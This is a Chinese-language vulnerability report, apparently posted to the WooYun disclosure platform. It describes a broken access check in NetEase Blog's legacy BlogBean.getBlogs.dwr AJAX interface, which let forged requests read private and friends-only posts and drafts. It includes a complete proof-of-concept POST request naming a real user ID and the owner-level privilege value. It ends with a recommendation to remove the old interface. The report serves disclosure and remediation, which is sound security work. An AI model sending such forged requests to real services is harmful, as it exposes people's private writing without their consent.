简要描述：该漏洞可造成用户博客中加密日志（好友可见、私人可见）以及日志草稿泄露。
详细说明：网易博客日志模块的AJAX请求接口通过URL参数传递用户等级（访客、好友、博主），并且不会对该参数进行判断，通过伪造请求即刻得到原本只有好友可见或者博主私人可见的日志。而且任何情况下该接口都会返回以草稿保存的日志，仅通过前端判断不予显示。
漏洞证明：以博客小管（http://blog.163.com/blog_admin）为例。通过其首页可得其的UID：721279。
 
向以下地址发起HTTP POST请求：
http://api.blog.163.com/dwr/call/plaincall/BlogBean.getBlogs.dwr
 
POST参数：
 
callCount=1
 
scriptSessionId=${scriptSessionId}187
 
c0-scriptName=BlogBean
 
c0-methodName=getBlogs
 
c0-id=0
 
c0-param0:number=260
 
c0-param1:number=20
 
c0-param2:number=721279
 
c0-param3:boolean=false
 
c0-param4:number=10000
 
c0-param5:boolean=false
 
c0-param6:boolean=false
 
batchId=687303
 
其中param0和param1分别是数量和起始点（这里只获取第260-280篇日志），param2是UID，param4是权限，10000代表博主（最高级）。
 
返回的是JSONP封装的数据，简单解析后可以发现其中有一篇在日志列表中不会出现的标题（title）为《贴出真实，秀出精彩－博客自拍之星》的日志，它的地址是http://blog.163.com/blog_admin/blog/static/72127920072276191481，allowView:10000表示它是博主私人可见，content即为该日志的内容。
修复方案：BlogBean.getBlogs.dwr是旧版博客里的AJAX接口，新版已经升级为BlogBeanNew.getBlogs.dwr且没有此漏洞。建议删除旧版接口。


作者  XiNGRZ@乌云